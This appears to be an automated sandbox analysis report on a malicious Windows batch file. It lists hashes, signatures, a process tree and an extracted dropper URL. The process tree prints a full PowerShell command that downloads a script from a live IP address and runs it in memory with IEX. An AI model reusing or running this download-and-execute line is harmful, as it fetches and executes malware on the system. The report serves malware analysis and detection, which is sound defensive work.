Overview

overview

10

Static

static

b0d58156fa...37.bat

windows7_x64

10

b0d58156fa...37.bat

windows10_x64

10

Analysis

  • max time kernel
    131s
  • max time network
    74s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    02-06-2020 10:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b0d58156fab428d26b46727824eabf37.bat

  • Size

    214B

  • MD5

    80701ef329f0effbde1182ab9f26be31

  • SHA1

    b948c5f5d1d8d2f7bb793db6ed2119d8143b8084

  • SHA256

    bfecfd11f233e3531ec0241d1186c28fd737e3b476a51e4000312296ab8c0c1c

  • SHA512

    f2a24c2587f2621b2a9d571522a4e0126af41f482d2e942579c199acacb98a4783dd03f06635173f59c6e37c2ad55f8778a7c0841e4848dee533ddf232ce5b9d

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/b0d58156fab428d26b46727824eabf37

Signatures

  • Program crash 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\b0d58156fab428d26b46727824eabf37.bat"
    1⤵
      PID:1572
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/b0d58156fab428d26b46727824eabf37');Invoke-XXZLMCF;Start-Sleep -s 10000"
        2⤵
          PID:1840
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 704
            3⤵
            • Program crash
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious behavior: EnumeratesProcesses
            PID:2148

      Network

      MITRE ATT&CK Matrix

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/2148-0-0x0000000004740000-0x0000000004741000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2148-1-0x0000000004740000-0x0000000004741000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2148-3-0x0000000004930000-0x0000000004931000-memory.dmp

        Filesize

        4KB

        Download